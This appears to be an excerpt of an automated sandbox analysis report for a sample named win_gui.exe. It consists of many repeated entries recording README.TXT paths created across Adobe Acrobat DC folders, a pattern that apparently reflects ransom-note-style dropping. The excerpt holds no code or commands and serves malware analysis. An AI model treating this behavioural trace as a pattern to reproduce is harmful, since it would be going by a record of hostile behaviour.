Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\versions\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\cef\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\libs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\css\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\js\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\css\README.TXTJump to behavior
